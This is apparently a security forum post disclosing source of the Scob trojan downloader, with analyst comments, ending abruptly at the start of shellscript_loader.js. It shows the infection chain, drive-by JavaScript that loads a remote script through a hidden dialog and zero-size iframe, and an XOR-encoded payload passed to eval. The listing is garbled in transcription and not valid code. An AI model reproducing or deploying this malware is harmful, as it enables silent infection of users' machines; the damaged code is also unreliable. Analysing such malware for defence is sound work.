[hide=30] Hello,

here is some full disclosure: the source code of the Scob trojan downloader is given below, for anyone who wants to know more about it.

Best Regards.
Franck Olivel - Security Engineer
K-OTik Security Survey 24 / 7
http://www.k-otik.com

-------------------------------------------------- -------------------
Compromised - (redirect) -> http://217.107.218.***/dot.php - (redirect) -> new.htm - (executed) -> md.htm & shellscript_loader.js - (executed) -> shellscript.js - (install) -> msits.exe

--------
new.htm
--------
[code] <script language="Javascript">
// Analyst note: this listing was damaged in transcription/translation (swapped
// keyword order, "(" / ")" where braces belong, HTML entities for quotes), so it
// is not valid script as shown. The comments describe only what is visible here.
//
// InjectedDuringRedirection opens 'md.htm' through showModalDialog with options
// that put the dialog at top/left -10000 and size 1x1, i.e. not visible to the
// user. It then assigns a "javascript" string holding a <script SRC=...> tag for
// shellscript_loader.js (host partly redacted by the poster) to a property of the
// dialog's return value. The property name appears as "Arrivals" in this copy;
// NOTE(review): presumably a translation artefact, original name not recoverable here.
InjectedDuringRedirection function () (
showModalDialog ( &#39;md.htm&#39; window, "dialogTop: -10000 \; dialogLeft: --
10000 \; dialogHeight: 1 \; dialogWidth: 1 \; "). Arrivals =" javascript &#39;<script SRC=\\&#39;http://217.107.218.***/shellscript_loader.js\\&#39;> <\ / script> ";
) </ script>
<script language="javascript"> setTimeout ( "myiframe.execScript (InjectedDuringRedirection.toString ())", 100
);
// The timer above (100 ms) passes the function's source text to execScript on the
// frame named myiframe; the timer below (101 ms) then passes a call to it. The
// document.write that follows creates that frame: an IFRAME with WIDTH = 0 and
// HEIGHT = 0 whose SRC is "redir.php".
// NOTE(review): the function name suggests the timers are meant to fire while the
// frame is being redirected; the listing itself does not show what redir.php returns.
// Indicators visible in this block: zero-size IFRAME, off-screen 1x1 modal dialog,
// execScript into another frame, and the reference to shellscript_loader.js.
setTimeout ( "myiframe.execScript ( &#39;InjectedDuringRedirection ()&#39", 101);
document.write ( &#39;<IFRAME ID = myiframe NAME = myiframe SRC = "redir.php" WIDTH = 0
HEIGHT = 0> </ IFRAME >&#39;</ script>
<script>
// Analyst note: obfuscated stage. `es` is a string of decimal numbers and `x` (34)
// is the starting key used by the decoding loop at the end of this block.
// This copy of the data is damaged: separators alternate between "," and ";",
// the word "and" appears in place of a separator, and several numbers are split
// across line breaks, so the list cannot be decoded reliably from this listing.
x = 34;
es = "84, 66, 86, 5, 73, 119; 71; 89; 95; 91, 12, 16, 14, 88; 89; 95; 86; 92; 67; 27; 85; 69; 9
3; 88, 78 and 94; 108; 82, 78, 74, 48, 105, 107, 120; 73; 79, 48, 38, 58; 105; 37, 9, 35; 41; 55
, 111, 109, 113, 61, 3, 59, 37, 35, 39, 118; 61; 53; 56, 41, 48, 59, 49, 20, 79, 0, 12, 0; 28;
93; 106; 98, 6, 40, 4, 8, 20, 64, 28, 4, 8, 30, 22 and 90, 23, 23, 20, 19, 30, 8, 20, 9, 19, 26; 60
, 239, 237, 237, 241, 164, 184, 166, 165, 255, 225, 227, 255, 233, 175, 181, 130, 154; 25
4, 208, 252, 240, 236, 184, 228, 236, 224, 246, 254, 178, 255, 241, 237, 196, 196, 208, 1
31, 153, 133, 132, 208, 192, 192, 222, 206, 140, 156, 222, 215, 146, 138, 191, 185, 219;
247, 217, 211, 193, 151, 211, 213, 210, 216, 204, 247, 148, 140, 142, 254, 227, 249, 169
, 165, 162, 172, 169, 191, 236, 169, 175, 187, 177, 236, 242, 241, 153, 134, 251, 158; 14
0; 138, 224, 182, 180, 169, 179, 179, 218, 135, 139, 143, 129, 223, 201, 200, 171, 211, 1
82, 183, 161, 172, 167, 161, 222, 188, 186, 167, 213, 157, 130, 131, 136, 195, 213, 212;
206, 204, 201, 209, 305, 305, 309, 301, 310, 308, 318, 297, 313, 317, 317, 292, 291, 352
, 367, 358, 382, 319, 369, 379, 377, 303, 300, 312, 373, 376, 371, 373, 306, 373, 362; 37
0; 258, 257, 342, 346, 340, 320, 283, 261, 348, 332, 338, 351, 259, 341, 259, 348, 339; 3
23; 347, 323, 320, 345, 339, 323, 282, 263, 262, 276, 339, 351, 340, 346, 291, 309, 380;
356, 383, 328, 332, 296, 280, 294, 314, 318, 316, 355, 317, 295, 319, 294, 378, 358, 356
, 357, 358, 379, 376, 364, 362, 363, 364, 369, 382, 366, 332, 321, 339, 335, 324, 257; 26
5; 260, 285, 260, 271, 261, 280, 323, 268, 256, 276, 264, 347, 328; "
// Decoder: split `es` on ";" into `ads` and iterate up to ads.length-1. For each
// element, XOR it with the current key `x`, add 1 to `x`, and append the resulting
// character (String.fromCharCode) to `ds`; the accumulated string is then handed
// to eval. The loop syntax is damaged in this copy, so whether eval sits inside or
// after the loop cannot be told from the listing.
// Because the evaluated script exists only after decoding, plain string matching on
// the page source will not see it; decode the array statically rather than letting
// the page run.
var ds = new String (); ads = es.split (";"); k = ads.length-1;
for (var j = 0; j <k j + +)
(e = ads [j] d = e ^ x x + = 1; ds = + ds String.fromCharCode (d) eval (ds)
</ script>

---------------------
shellscript_loader.js
---------------------
getRealShell function () (